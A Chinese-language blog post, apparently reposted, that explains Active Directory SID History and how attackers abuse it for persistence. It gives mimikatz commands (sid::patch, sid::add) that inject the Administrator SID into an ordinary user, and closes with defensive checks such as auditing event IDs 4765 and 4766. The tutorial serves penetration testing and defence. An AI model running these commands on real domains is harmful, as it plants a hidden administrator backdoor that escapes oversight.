其他分享
首页 > 其他分享> > 权限维持之:SID History 域控权限维持

权限维持之:SID History 域控权限维持

作者:互联网

目录

1 SID 作用

​ 每个用户都有自己的SID,SID的作用主要是跟踪安全主体控制用户连接资源时的访问权限,SID History是在域迁移过程中需要使用的一个属性。

​ 如果A域中的域用户迁移到B域中,那么该用户的SID值就会改变,进而其权限也会改变。导致迁移后的用户无法访问以前可以访问的资源。SID History的作用是在域迁移过程中保持域用户的访问权限,如果迁移后用户的SID值改变,系统会将原来的SID添加到迁移后用户的SID History属性中,使迁移后的用户保持原有权限、能够访问其原来可以访问的资源。使用mimikatz可以将SID History属性添加到任意用户的SID History属性中。在渗透测试中,如果获得了域管理员权限(或者等同于域管理员权限),就可以将SID History作为实现持久化的方法。

2 利用 SID History 操作过程

  1. 使用域管理员权限的 Poweshell 查看 tester 用户的 SID History 属性

    Import-Module ActiveDirectory
    Get-ADUser tester -Properties sidhistory
    
  2. 在域管理员权限的命令行窗口打开 mimikatz,将 Administrator 的 SID 添加到恶意用户 tester 的 SID History 属性中

    # 将高权限的 SID History 属性注入
    privilege::debug
    # 注入SID之前需要使用以下命令修复NTDS服务,否则无法将高权限的SID注人低权限用户的SID History属性;
    sid::patch
    sid::add /sam:tester /new:administrator
    
    # 查看 tester 用户的 SID History 属性
    Get-ADUser tester -Properties sidhistory
    
    # 清除恶意用户的 SID History 属性
    sid::clear /sam:username
    

    image-20211218181108759

    image-20211218174130529

3 SID History 权限维持的防御

  1. 经常查看域用户中SID为500的用户。
  2. 完成域迁移工作后,对有相同SID History属性的用户进行检查
  3. 定期检查ID为4765和4766的日志。4765为将 SID Histtory属性添加到用户的日志。4766为将SID History属性添加到用户失败的日志。

标签:权限,tester,用户,SID,域控,History,属性
来源: https://www.cnblogs.com/f-carey/p/15705635.html